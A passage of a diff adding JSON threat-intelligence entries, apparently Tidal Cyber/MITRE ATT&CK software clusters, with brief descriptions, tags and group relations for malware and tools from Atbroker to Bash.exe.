"TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5085", + "source": "Tidal Cyber", + "tags": [ + "85a29262-64bd-443c-9e08-3ee26aac859b", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "15e08d84-1977-4cc5-a73a-bd1cadff4bf0", + "type": "similar" + } + ], + "uuid": "2efae55c-86f3-4234-af26-1c75e922d81a", + "value": "Atbroker" + }, + { + "description": "Atera Agent is a legitimate remote administration tool (specifically a remote management and maintenance (\"RMM\") solution) that adversaries have used as a command and control tool for remote code execution, tool ingress, and persisting in victim environments.[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5014", + "source": "Tidal Cyber", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444", + "9a5ed991-6fe7-49fe-8536-91defc449b18", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "992bdd33-4a47-495d-883a-58010a2f0efb", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "393da13e-016c-41a3-9d89-b33173adecbf", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + } + ], + "uuid": "f8113a9f-a706-46df-8370-a9cef1c75f30", + "value": "Atera Agent" + }, + { + "description": "[Attor](https://app.tidalcyber.com/software/89c35e9f-b435-4f58-9073-f24c1ee8754f) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://app.tidalcyber.com/software/89c35e9f-b435-4f58-9073-f24c1ee8754f) has a loadable plugin architecture to customize functionality for specific targets.[[ESET Attor Oct 2019](https://app.tidalcyber.com/references/fdd57c56-d989-4a6f-8cc5-5b3713605dec)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0438", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8f423bd7-6ca7-4303-9e85-008c7ad5fdaa", + "type": "similar" + } + ], + "uuid": "89c35e9f-b435-4f58-9073-f24c1ee8754f", + "value": "Attor" + }, + { + "description": "[[TrendMicro Lazarus Nov 2018](https://app.tidalcyber.com/references/4c697316-c13a-4243-be18-c0e059e4168c)]", + "meta": { + "id": "259e2844-8b29-4310-abbb-44e3985586a0" + }, + "related": [ + { + "dest-uuid": "d0c25f14-5eb3-40c1-a890-2ab1349dff53", + "type": "similar" + } + ], + "uuid": "cf4b3cc1-c60a-43ac-8599-fce5dbade473", + "value": "Roptimizer" + }, + { + "description": "[AuditCred](https://app.tidalcyber.com/software/d0c25f14-5eb3-40c1-a890-2ab1349dff53) is a malicious DLL that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) during their 2018 attacks.[[TrendMicro Lazarus Nov 2018](https://app.tidalcyber.com/references/4c697316-c13a-4243-be18-c0e059e4168c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0347", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "24b4ce59-eaac-4c8b-8634-9b093b7ccd92", + "type": "similar" + }, + { + "dest-uuid": "cf4b3cc1-c60a-43ac-8599-fce5dbade473", + "type": "similar" + } + ], + "uuid": "d0c25f14-5eb3-40c1-a890-2ab1349dff53", + "value": "AuditCred" + }, + { + "description": "[AutoIt backdoor](https://app.tidalcyber.com/software/3f927596-5219-49eb-bd0d-57068b0e04ed) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. [[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)] This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0129", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "f5352566-1a64-49ac-8f7f-97e1d1a03300", + "type": "similar" + } + ], + "uuid": "3f927596-5219-49eb-bd0d-57068b0e04ed", + "value": "AutoIt backdoor" + }, + { + "description": "[AuTo Stealer](https://app.tidalcyber.com/software/649a4cfc-c0d0-412d-a28c-1bd4ed604ea8) is malware written in C++ has been used by [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) since at least December 2021 to target government agencies and personnel in India and Afghanistan.[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1029", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "31bc763e-623f-4870-9780-86e43d732594", + "type": "used-by" + }, + { + "dest-uuid": "3e4e2c79-2b27-4245-a5c1-5586a3cbd8f5", + "type": "similar" + } + ], + "uuid": "649a4cfc-c0d0-412d-a28c-1bd4ed604ea8", + "value": "AuTo Stealer" + }, + { + "description": "[Avaddon](https://app.tidalcyber.com/software/bad92974-35f6-4183-8024-b629140c6ee6) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.[[Awake Security Avaddon](https://app.tidalcyber.com/references/c113cde7-5dd5-45e9-af16-3ab6ed0b1728)][[Arxiv Avaddon Feb 2021](https://app.tidalcyber.com/references/dbee8e7e-f477-4bd5-8225-84e0e222617e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0640", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "58c5a3a1-928f-4094-9e98-a5a4e56dd5f3", + "type": "similar" + } + ], + "uuid": "bad92974-35f6-4183-8024-b629140c6ee6", + "value": "Avaddon" + }, + { + "description": "[Avenger](https://app.tidalcyber.com/software/e5ca0192-e905-46a1-abef-ce1119c1f967) is a downloader that has been used by [BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) since at least 2019.[[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0473", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "36ede314-7db4-4d09-b53d-81bbfbe5f6f8", + "type": "similar" + } + ], + "uuid": "e5ca0192-e905-46a1-abef-ce1119c1f967", + "value": "Avenger" + }, + { + "description": "[AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.[[Malwarebytes AvosLocker Jul 2021](https://app.tidalcyber.com/references/88dffb14-a7a7-5b36-b269-8283dec0f1a3)][[Trend Micro AvosLocker Apr 2022](https://app.tidalcyber.com/references/01fdc732-0951-59e2-afaf-5fe761357e7f)][[Joint CSA AvosLocker Mar 2022](https://app.tidalcyber.com/references/8ad57a0d-d74f-5802-ab83-4ddac1beb083)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S1053", + "source": "MITRE", + "tags": [ + "c3779a84-8132-4c62-be2f-9312ad41c273", + "ce9f1048-09c1-49b0-a109-dd604afbf3cd", + "fe3eb26d-6daa-4f82-b0dd-fc1e2fffbc2b", + "9e4936f0-e3b7-4721-a638-58b2d093b2f2", + "24448a05-2337-4bc9-a889-a83f2fd1f3ad", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0945a1a5-a79a-47c8-9079-10c16cdfcb5d", + "type": "similar" + } + ], + "uuid": "e792dc8d-b0f4-5916-8850-a61ff53125d0", + "value": "AvosLocker" + }, + { + "description": "[Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) has been observed in the wild as early as 2016.\nIn July 2018, [Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) has been seen used for cryptocurrency theft. [[Unit42 Azorult Nov 2018](https://app.tidalcyber.com/references/44ceddf6-bcbf-4a60-bb92-f8cdc675d185)][[Proofpoint Azorult July 2018](https://app.tidalcyber.com/references/a85c869a-3ba3-42c2-9460-d3d1f0874044)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0344", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "f9b05f33-d45d-4e4d-aafe-c208d38a0080", + "type": "similar" + } + ], + "uuid": "cc68a7f0-c955-465f-bee0-2dacbb179078", + "value": "Azorult" + }, + { + "description": "[[Sogeti CERT ESEC Babuk March 2021](https://app.tidalcyber.com/references/e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e)][[McAfee Babuk February 2021](https://app.tidalcyber.com/references/bb23ca19-78bb-4406-90a4-bf82bd467e04)][[Trend Micro Ransomware February 2021](https://app.tidalcyber.com/references/64a86a3f-0160-4766-9ac1-7d287eb2c323)]", + "meta": { + "id": "b3ed8082-31ae-4614-8562-07f5ae639e0d" + }, + "related": [ + { + "dest-uuid": "0dc07eb9-66df-4116-b1bc-7020ca6395a1", + "type": "similar" + } + ], + "uuid": "b9d20905-d9b0-41e8-8012-52cab3e626f1", + "value": "Babyk" + }, + { + "description": "[[Sogeti CERT ESEC Babuk March 2021](https://app.tidalcyber.com/references/e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e)][[McAfee Babuk February 2021](https://app.tidalcyber.com/references/bb23ca19-78bb-4406-90a4-bf82bd467e04)]", + "meta": { + "id": "4112f232-14ce-4bc8-b340-4f1614ceef03" + }, + "related": [ + { + "dest-uuid": "0dc07eb9-66df-4116-b1bc-7020ca6395a1", + "type": "similar" + } + ], + "uuid": "30583664-1270-4dab-bff3-83f394740ca8", + "value": "Vasa Locker" + }, + { + "description": "[Babuk](https://app.tidalcyber.com/software/0dc07eb9-66df-4116-b1bc-7020ca6395a1) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://app.tidalcyber.com/software/0dc07eb9-66df-4116-b1bc-7020ca6395a1) employ a \"Big Game Hunting\" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.[[Sogeti CERT ESEC Babuk March 2021](https://app.tidalcyber.com/references/e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e)][[McAfee Babuk February 2021](https://app.tidalcyber.com/references/bb23ca19-78bb-4406-90a4-bf82bd467e04)][[CyberScoop Babuk February 2021](https://app.tidalcyber.com/references/0a0aeacd-0976-4c84-b40d-5704afca9f0e)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0638", + "source": "MITRE", + "tags": [ + "b5962a84-f1c7-4d0d-985c-86301db95129", + "12124060-8392-49a3-b7b7-1dde3ebc8e67", + "915e7ac2-b266-45d7-945c-cb04327d6246", + "d713747c-2d53-487e-9dac-259230f04460", + "fde4c246-7d2d-4d53-938b-44651cf273f1", + "964c2590-4b52-48c6-afff-9a6d72e68908", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172", + "a2e000da-8181-4327-bacd-32013dbd3654" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "61c7a91a-0b83-461d-ad32-75d96eed4a09", + "type": "similar" + }, + { + "dest-uuid": "b9d20905-d9b0-41e8-8012-52cab3e626f1", + "type": "similar" + }, + { + "dest-uuid": "30583664-1270-4dab-bff3-83f394740ca8", + "type": "similar" + } + ], + "uuid": "0dc07eb9-66df-4116-b1bc-7020ca6395a1", + "value": "Babuk" + }, + { + "description": "[BabyShark](https://app.tidalcyber.com/software/ebb824a2-abff-4bfd-87f0-d63cb02b62e6) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. [[Unit42 BabyShark Feb 2019](https://app.tidalcyber.com/references/634404e3-e2c9-4872-a280-12d2be168cba)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0414", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "d1b7830a-fced-4be3-a99c-f495af9d9e1b", + "type": "similar" + } + ], + "uuid": "ebb824a2-abff-4bfd-87f0-d63cb02b62e6", + "value": "BabyShark" + }, + { + "description": "[BackConfig](https://app.tidalcyber.com/software/2763ad8c-cf4e-42eb-88db-a40ff8f96cf9) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a).[[Unit 42 BackConfig May 2020](https://app.tidalcyber.com/references/f26629db-c641-4b6b-abbf-b55b9cc91cf1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0475", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "used-by" + }, + { + "dest-uuid": "c13d9621-aca7-436b-ab3d-3a95badb3d00", + "type": "similar" + } + ], + "uuid": "2763ad8c-cf4e-42eb-88db-a40ff8f96cf9", + "value": "BackConfig" + }, + { + "description": "", + "meta": { + "id": "cefb8684-f2de-48a7-a76f-15823a6f5410" + }, + "related": [ + { + "dest-uuid": "f7cc5974-767c-4cb4-acc7-36295a386ce5", + "type": "similar" + } + ], + "uuid": "044ca42d-c9cf-4f75-b119-1df3c80a3afd", + "value": "Havex" + }, + { + "description": "[Backdoor.Oldrea](https://app.tidalcyber.com/software/f7cc5974-767c-4cb4-acc7-36295a386ce5) is a modular backdoor that used by [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) against energy companies since at least 2013. [Backdoor.Oldrea](https://app.tidalcyber.com/software/f7cc5974-767c-4cb4-acc7-36295a386ce5) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)][[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)][[Symantec Dragonfly Sept 2017](https://app.tidalcyber.com/references/11bbeafc-ed5d-4d2b-9795-a0a9544fb64e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0093", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "083bb47b-02c8-4423-81a2-f9ef58572974", + "type": "similar" + }, + { + "dest-uuid": "044ca42d-c9cf-4f75-b119-1df3c80a3afd", + "type": "similar" + } + ], + "uuid": "f7cc5974-767c-4cb4-acc7-36295a386ce5", + "value": "Backdoor.Oldrea" + }, + { + "description": "", + "meta": { + "id": "a258d65f-c9ee-4074-9cfd-710dbb0d2c05" + }, + "related": [ + { + "dest-uuid": "d0daaa00-68e1-4568-bb08-3f28bcd82c63", + "type": "similar" + } + ], + "uuid": "4f538bd5-3e2a-44f7-b58e-97219284df55", + "value": "Lecna" + }, + { + "description": "[BACKSPACE](https://app.tidalcyber.com/software/d0daaa00-68e1-4568-bb08-3f28bcd82c63) is a backdoor used by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that dates back to at least 2005. [[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0031", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "be45ff95-6c74-4000-bc39-63044673d82f", + "type": "used-by" + }, + { + "dest-uuid": "fb261c56-b80e-43a9-8351-c84081e7213d", + "type": "similar" + }, + { + "dest-uuid": "4f538bd5-3e2a-44f7-b58e-97219284df55", + "type": "similar" + } + ], + "uuid": "d0daaa00-68e1-4568-bb08-3f28bcd82c63", + "value": "BACKSPACE" + }, + { + "description": "Backstab is a tool used to terminate antimalware-protected processes.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5026", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "5a9a7a54-21cb-4a5c-bef0-d37f8678bf46", + "value": "Backstab" + }, + { + "description": "[BADCALL](https://app.tidalcyber.com/software/d7aa53a5-0912-4952-8f7f-55698e933c3b) is a Trojan malware variant used by the group [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). [[US-CERT BADCALL](https://app.tidalcyber.com/references/aeb4ff70-fa98-474c-8337-9e50d07ee378)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0245", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "9dbdadb6-fdbf-490f-a35f-38762d06a0d2", + "type": "similar" + } + ], + "uuid": "d7aa53a5-0912-4952-8f7f-55698e933c3b", + "value": "BADCALL" + }, + { + "description": "[BADFLICK](https://app.tidalcyber.com/software/8c454294-81cb-45d0-b299-818994ad3e6f) is a backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)][[Accenture MUDCARP March 2019](https://app.tidalcyber.com/references/811d433d-27a4-4411-8ec9-b3a173ba0033)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0642", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "57d83eac-a2ea-42b0-a7b2-c80c55157790", + "type": "similar" + } + ], + "uuid": "8c454294-81cb-45d0-b299-818994ad3e6f", + "value": "BADFLICK" + }, + { + "description": "[BADHATCH](https://app.tidalcyber.com/software/16481e0f-49d5-54c1-a1fe-16d9e7f8d08c) is a backdoor that has been utilized by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) since at least 2019. [BADHATCH](https://app.tidalcyber.com/software/16481e0f-49d5-54c1-a1fe-16d9e7f8d08c) has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.[[Gigamon BADHATCH Jul 2019](https://app.tidalcyber.com/references/69a45479-e982-58ee-9e2d-caaf825f0ad4)][[BitDefender BADHATCH Mar 2021](https://app.tidalcyber.com/references/958cfc9a-901c-549d-96c2-956272b240e3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1081", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "3553b49d-d4ae-4fb6-ab17-0adbc520c888", + "type": "similar" + } + ], + "uuid": "16481e0f-49d5-54c1-a1fe-16d9e7f8d08c", + "value": "BADHATCH" + }, + { + "description": "[BADNEWS](https://app.tidalcyber.com/software/34c24d27-c779-42a4-9f61-3f0d3fea6fd4) is malware that has been used by the actors responsible for the [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. [[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)] [[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0128", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "used-by" + }, + { + "dest-uuid": "e9595678-d269-469e-ae6b-75e49259de63", + "type": "similar" + } + ], + "uuid": "34c24d27-c779-42a4-9f61-3f0d3fea6fd4", + "value": "BADNEWS" + }, + { + "description": "[BadPatch](https://app.tidalcyber.com/software/10e76722-4b52-47f6-9276-70e95fecb26b) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.[[Unit 42 BadPatch Oct 2017](https://app.tidalcyber.com/references/9c294bf7-24ba-408a-90b8-5b9885838e1b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0337", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "9af05de0-bc09-4511-a350-5eb8b06185c1", + "type": "similar" + } + ], + "uuid": "10e76722-4b52-47f6-9276-70e95fecb26b", + "value": "BadPatch" + }, + { + "description": "", + "meta": { + "id": "98c81574-1f3f-49fa-8f03-b5462bb3fc5d" + }, + "related": [ + { + "dest-uuid": "a1d86d8f-fa48-43aa-9833-7355750e455c", + "type": "similar" + } + ], + "uuid": "1679c995-7141-40ac-a327-b5afc8f275c8", + "value": "Win32/Diskcoder.D" + }, + { + "description": "[Bad Rabbit](https://app.tidalcyber.com/software/a1d86d8f-fa48-43aa-9833-7355750e455c) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://app.tidalcyber.com/software/a1d86d8f-fa48-43aa-9833-7355750e455c) has also targeted organizations and consumers in Russia. [[Secure List Bad Rabbit](https://app.tidalcyber.com/references/f4cec03a-ea94-4874-9bea-16189e967ff9)][[ESET Bad Rabbit](https://app.tidalcyber.com/references/a9664f01-78f0-4461-a757-12f54ec99a56)][[Dragos IT ICS Ransomware](https://app.tidalcyber.com/references/60187301-8d70-4023-8e6d-59cbb1468f0d)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0606", + "source": "MITRE", + "tags": [ + "5a463cb3-451d-47f7-93e4-1886150697ce", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "type": "similar" + }, + { + "dest-uuid": "1679c995-7141-40ac-a327-b5afc8f275c8", + "type": "similar" + } + ], + "uuid": "a1d86d8f-fa48-43aa-9833-7355750e455c", + "value": "Bad Rabbit" + }, + { + "description": "[Bandook](https://app.tidalcyber.com/software/5c0f8c35-88ff-40a1-977a-af5ce534e932) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://app.tidalcyber.com/software/5c0f8c35-88ff-40a1-977a-af5ce534e932) has been used by [Dark Caracal](https://app.tidalcyber.com/groups/7ad94dbf-9909-42dd-8b62-a435481bdb14), as well as in a separate campaign referred to as \"Operation Manul\".[[EFF Manul Aug 2016](https://app.tidalcyber.com/references/311a3863-3897-4ddf-a251-d0467a56675f)][[Lookout Dark Caracal Jan 2018](https://app.tidalcyber.com/references/c558f5db-a426-4041-b883-995ec56e7155)][[CheckPoint Bandook Nov 2020](https://app.tidalcyber.com/references/352652a9-86c9-42e1-8ee0-968180c6a51e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0234", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7ad94dbf-9909-42dd-8b62-a435481bdb14", + "type": "used-by" + }, + { + "dest-uuid": "835a79f1-842d-472d-b8f4-d54b545c341b", + "type": "similar" + } + ], + "uuid": "5c0f8c35-88ff-40a1-977a-af5ce534e932", + "value": "Bandook" + }, + { + "description": "[[McAfee Bankshot](https://app.tidalcyber.com/references/c748dc6c-8c19-4a5c-840f-3d47955a6c78)]", + "meta": { + "id": "d00a70a9-1cc3-4a56-8977-43071092e5bc" + }, + "related": [ + { + "dest-uuid": "24b8471d-698f-48cc-b47a-8fbbaf28b293", + "type": "similar" + } + ], + "uuid": "0bcd5b61-4408-4a35-9b8f-310cd23a4ca2", + "value": "Trojan Manuscript" + }, + { + "description": "[Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) used the [Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293) implant in attacks against the Turkish financial sector. [[McAfee Bankshot](https://app.tidalcyber.com/references/c748dc6c-8c19-4a5c-840f-3d47955a6c78)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0239", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "1f6e3702-7ca1-4582-b2e7-4591297d05a8", + "type": "similar" + }, + { + "dest-uuid": "0bcd5b61-4408-4a35-9b8f-310cd23a4ca2", + "type": "similar" + } + ], + "uuid": "24b8471d-698f-48cc-b47a-8fbbaf28b293", + "value": "Bankshot" + }, + { + "description": "[[Bash.exe - LOLBAS Project](/references/7d3efbc7-6abf-4f3f-aec8-686100bb90ad)]", + "meta": { + "id": "233f9470-8e08-4b6a-830e-0a7c2e155a12", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "cef3a09e-22ca-43dc-ad4a-95741a3b85ff", + "type": "similar" + } + ], + "uuid": "fe0ff225-66b8-4629-86e3-9b4ce9bf6eb8", + "value": "Bash.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License 